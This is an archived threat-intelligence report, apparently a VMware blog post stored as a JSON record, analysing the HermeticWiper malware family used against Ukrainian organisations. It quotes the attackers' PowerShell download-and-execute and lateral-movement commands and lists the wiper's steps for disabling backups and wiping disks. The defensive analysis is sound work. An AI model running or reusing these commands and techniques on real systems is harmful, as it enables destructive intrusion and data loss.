{
	"id": "d8a87348-547f-44c3-80ea-53a1a4137f8e",
	"created_at": "2026-04-06T00:10:06.363378Z",
	"updated_at": "2026-04-10T03:19:58.115436Z",
	"deleted_at": null,
	"sha1_hash": "458b4068051828e9d5d36a05498f453fbd6c665b",
	"title": "Hermetic Malware: Multi-component Threat Targeting Ukraine Organizations",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 605482,
	"plain_text": "Hermetic Malware: Multi-component Threat Targeting Ukraine\r\nOrganizations\r\nBy Giovanni Vigna, Oleg Boyarchuk, Stefano Ortolani\r\nPublished: 2022-03-04 · Archived: 2026-04-05 23:19:12 UTC\r\nContributors: Giovanni Vigna, Oleg Boyarchuk, Stefano Ortolani\r\nIntroduction\r\nThe continued assault on Ukraine will go down in history as the first one that was truly carried out both kinetically on the\r\nbattlefield and virtually using cyberattacks against the computer infrastructure of the invaded nation.\r\nAs the invasion started and escalated, new malware threats were introduced by malicious actors to harm Ukrainian\r\norganizations. Early in the assault, security researchers have observed the emergence of new threats that appears to be\r\ndeveloped ad hoc to be key tools in cyber-war efforts.\r\nIn addition to well-known attacks and threats, such as network DDoS and ransomware, these threats included “wipers,”\r\nwhose sole purpose is the disabling of the targeted hosts, often combined with other tools that allow the attackers to infect\r\nthe largest number of hosts possible.\r\nWhile these attacks targeted specific organizations, there is a substantial risk that in the highly connected, distributed\r\nenvironments used to exchange and share information in multi-national organizations these attacks might spill beyond their\r\nintended targets.\r\nIt is therefore of paramount importance to understand these threats in order to help protect both Ukrainian organizations and\r\nthe rest of the world. To this end, CISA has published a series of guidelines to understand and prepare for possible Russian\r\nstate-sponsored attacks. VMware Security has provided an overview of this Shields Up guidance, along with additional\r\nthreat intelligence resources for VMware customers here.\r\nIn mid-January, Microsoft warned about a wiper malware threat, called WhisperGate, targeting Ukrainian organizations.\r\nThis particular threat would act as a wiper that irreversibly corrupts a target while posing as ransomware.\r\nThen, right before the start of the Russian invasion, researchers at ESET have identified a series of components that,\r\ntogether, worked to cripple Ukrainian target networks: HermeticWiper, HermeticWizard, and HermeticRansom. The names\r\nof these samples are derived from the certificate that was used to sign the binary (the signing company is Hermetica Digital\r\nLtd, but according to a Reuters report this is not the result of a compromised certificate: it is possible that the threat actors\r\nposed as the owners of the company when contacting the certification authority).\r\nHermeticWiper is the destructive payload, while HermeticWizard is the tool that leverages WMI and SMB in order to spread\r\nto additional hosts. Finally, HermeticRansom is a ransomware sample written in Go.\r\nAttack Vector\r\nThe attack was multi-target, resulting in each company being compromised in a slightly different manner; for example,\r\nSymantec in their analysis reported two different exploits used in the attacks (TA0001) carried out against the investigated\r\ntargets: one targeting Microsoft SQL Server (CVE-2021-1636) and another affecting Apache Tomcat. While it might be too\r\nearly to have a complete picture of all possible paths of entry, the TTPs employed during the execution and lateral\r\npropagation phases are a bit more consistent.\r\nBoth ESET and Symantec detail a combination of WMI/SMB techniques; in particular, the decoded PowerShell commands\r\nused to download and execute foreign artifacts follow a structure consistent with a tool known to ease the deployment of\r\nhttps://blogs.vmware.com/networkvirtualization/2022/03/hermetic-malware-multi-component-threat-targeting-ukraine-organizations.html/\r\nPage 1 of 5\n\nsemi-interactive shells:\r\ncmd.exe /Q /c powershell -c “(New-Object\r\nSystem.Net.WebClient).DownloadFile(‘hxxp://192.168.3.13/email.jpeg’,’CSIDL_SYSTEM_DRIVE\\temp\\sys.tmp1′)”\r\n1\u003e \\\\127.0.0.1\\ADMIN$\\__1636727589.6007507 2\u003e\u00261: this command was used to move a local resource (JPEG\r\nfile) laterally.\r\ncmd.exe /Q /c move CSIDL_SYSTEM_DRIVE\\temp\\sys.tmp1 CSIDL_WINDOWS\\policydefinitions\\postgresql.exe\r\n1\u003e \\\\127.0.0.1\\ADMIN$\\__1636727589.6007507 2\u003e\u00261: this command was used to execute the task coded in the\r\npostgresql.exe executable.\r\nIn both cases, we can see that the structure of the command redirects the output (\u003e) to a temporary file located in the\r\nADMIN$ share which is then accessible by the user account with local administrator privileges. Both the technique and the\r\ntemporary file name match impacket’s wmiexec, whose source code is available at\r\nhttps://github.com/SecureAuthCorp/impacket/blob/master/examples/wmiexec.py, see Figure 1 for a fragment.\r\nFigure 1: wmiexec.py snippet executing a command on a remote host.\r\nThe technique relies on spawning a command interpreter (cmd) on the target system via the Windows Management\r\nInstrumentation (WMI); on the network side, this translates into two different TCP connections (port 135 and 445) for the\r\ninitial negotiation and file transfer (SMB), followed by another connection to the “Winmgmt Windows service” over a\r\ndynamically allocated port for the actual command communication and execution. The number of different connections that\r\nneed to be established simultaneously provides a useful anomaly that NDR systems can easily leverage.\r\nESET also reports cases where HermeticWiper was deployed using Group Policy settings (GPO), which is a technique that\r\nVMware TAU has seen widely adopted by ransomware actors when deploying scheduled tasks to automate lateral\r\npropagation. While it will be a while before Incident Response teams are able to detail all intrusions, there are already five\r\ndifferent HermeticWiper samples known to the public (see Table 1). In the next section, we analyze some of the samples in\r\nmore detail and shed some light on the differences in-between them.\r\nHermetic Wiper\r\nA wiper is a malware whose aim is to make a system unavailable in the fastest and most reliable way; a slow wiper would\r\ngive the user a chance to interrupt the process before completion and being unreliable would defeat its main purpose. The\r\nengineers that coded HermeticWiper made sure that both aspects were adequately addressed; the following list of steps\r\ndetails how:\r\n1. Obtain SeBackupPrivilege privilege for unlimited file write privileges.\r\n2. Disable memory dumps by zeroing the CrashDumpEnabled value of\r\nHKLM\\SYSTEM\\CurrentControlSet\\Control\\CrashControl registry key.\r\nhttps://blogs.vmware.com/networkvirtualization/2022/03/hermetic-malware-multi-component-threat-targeting-ukraine-organizations.html/\r\nPage 2 of 5\n\n3. Extract epmntdrv.sys from its resources and store it on disk. Note that epmntdrv.sys is a legitimate benign driver\r\ndeveloped by EaseUS (a company providing data recovery and backup software).\r\n4. Obtain SeLoadDriverPrivilege privilege to gain the ability to load a driver.\r\n5. Create a service for the dropped epmntdrv.sys to finally load the driver.\r\n6. Stop the VSS (Volume Shadow Copy) service to disable backups.\r\n7. Read the geometry of every disk attached to the system by accessing the low level device \\\\.\\PhysicalDriveX.\r\n8. Initiate a delayed system reboot.\r\n9. Disable displaying compressed and encrypted NTFS files in color by zeroing the ShowCompColor parameter of the\r\nHKU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced registry key.\r\n10. Disable pop-ups for files in Explorer by zeroing the ShowInfoTip value of the same registry key.\r\n11. Use the \\\\.\\EPMNTDRV device provided by epmntdrv.sys to fully wipe the disks.\r\nFigure 2: Visual representation of the binary diff between the two types of samples.\r\nWe analyzed all five samples, and while the implemented functionalities are an exact match, there are a couple of details that\r\ndiffer: the most prominent is a check to determine the presence of “C:\\Windows\\SYSVOL” by invoking the\r\n“GetFileAttributesW” API, see Figure 2; if we are to believe the compilation timestamp, this is done only by the two most\r\nrecent samples (see Table 1); coincidentally, only the most recent sample is signed, as if the authors forgot to sign the sample\r\nafter implementing the SYSVOL check, and had to quickly add the signature prior the actual deployment.\r\nhttps://blogs.vmware.com/networkvirtualization/2022/03/hermetic-malware-multi-component-threat-targeting-ukraine-organizations.html/\r\nPage 3 of 5\n\nFigure 3: Decompiled main function that invokes “GetFileAttributeW”.\r\nSYSVOL is a folder that resides on every domain controller within a domain; the default location for the SYSVOL is\r\nC:\\Windows\\SYSVOL. By checking the presence of this directory before rebooting the system, HermeticWiper makes sure\r\nit is not as destructive on domain controllers; the attacker might have planned to retain control of those systems (even if for\r\njust a little longer) to propagate laterally further, although the presence of the HermeticWizard worm, as detailed by ESET,\r\nmight have made this step not as critical as it usually is.\r\nTable 1: HermeticWiper samples known to date.\r\nFirst VT\r\nsubmission\r\nCompilation\r\ntimestamp\r\nSigned?\r\nChecking\r\nSysvol?\r\nsha256\r\n2022-02-23\r\n18:14:17\r\nUTC\r\nWed Feb 23\r\n10:48:53\r\n2022\r\nSigned by\r\nHermetica\r\nDigital\r\nLtd\r\nYes 1bc44eef75779e3ca1eefb8ff5a64807dbc942b1e4a2672d77b9f6928d2925\r\n2022-02-25\r\n11:44:15\r\nUTC\r\nWed Feb 23\r\n10:48:53\r\n2022\r\nNo Yes 06086c1da4590dcc7f1e10a6be3431e1166286a9e7761f2de9de79d7fda9c\r\n2022-02-24\r\n17:29:39\r\nUTC\r\nTue Dec 28\r\n09:37:16\r\n2021\r\nSigned by\r\nHermetica\r\nDigital\r\nLtd\r\nNo 2c10b2ec0b995b88c27d141d6f7b14d6b8177c52818687e4ff8e6ecf53adf\r\n2022-02-24\r\n17:29:39\r\nUTC\r\nTue Dec 28\r\n09:37:16\r\n2021\r\nSigned by\r\nHermetica\r\nDigital\r\nLtd\r\nNo 3c557727953a8f6b4788984464fb77741b821991acbf5e746aebdd02615b\r\n2022-02-24\r\n06:35:51\r\nUTC\r\nTue Dec 28\r\n09:37:16\r\n2021\r\nSigned by\r\nHermetica\r\nDigital\r\nLtd\r\nNo 0385eeab00e946a302b24a91dea4187c1210597b8e17cd9e2230450f5ece2\r\nhttps://blogs.vmware.com/networkvirtualization/2022/03/hermetic-malware-multi-component-threat-targeting-ukraine-organizations.html/\r\nPage 4 of 5\n\nBesides this detail, all samples have 100% overlapping code. In conclusion, we made sure that NSX ATA customers were\r\nadequately protected, and we verified that all samples were detected as malicious. Figure 4 shows the verdict and behavioral\r\nsummary after submitting HermeticWiper for analysis: we can see detailed all the identified behaviors, including activities\r\nlike “loading a kernel driver” or “accessing the disk with low-level routines”, both essential for the wiper to carry out its\r\nnefarious tasks.\r\nFigure 4: NSX ATA analysis of ‘0385eeab00e946a302b24a91dea4187c1210597b8e17cd9e2230450f5ece21da’.\r\nConclusions\r\nDestructive attacks against a nation’s infrastructure cause network disruptions and affect the distribution of goods and\r\nservices.\r\nTherefore, in the current situation in which malware threats are deployed as cyber-weapons, it is necessary to increase the\r\nalert level and continuously update protection mechanisms with the latest intelligence about these threats.\r\nIn addition, the use of effective authentication procedures combined with network segmentation and restrictive policies can\r\nseverely limit the ability of attackers to obtain initial access to computer networks and deploy their malware.\r\nSource: https://blogs.vmware.com/networkvirtualization/2022/03/hermetic-malware-multi-component-threat-targeting-ukraine-organizations.html/\r\nhttps://blogs.vmware.com/networkvirtualization/2022/03/hermetic-malware-multi-component-threat-targeting-ukraine-organizations.html/\r\nPage 5 of 5",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://blogs.vmware.com/networkvirtualization/2022/03/hermetic-malware-multi-component-threat-targeting-ukraine-organizations.html/"
	],
	"report_names": [
		"hermetic-malware-multi-component-threat-targeting-ukraine-organizations.html"
	],
	"threat_actors": [],
	"ts_created_at": 1775434206,
	"ts_updated_at": 1775791198,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/458b4068051828e9d5d36a05498f453fbd6c665b.pdf",
		"text": "https://archive.orkl.eu/458b4068051828e9d5d36a05498f453fbd6c665b.txt",
		"img": "https://archive.orkl.eu/458b4068051828e9d5d36a05498f453fbd6c665b.jpg"
	}
}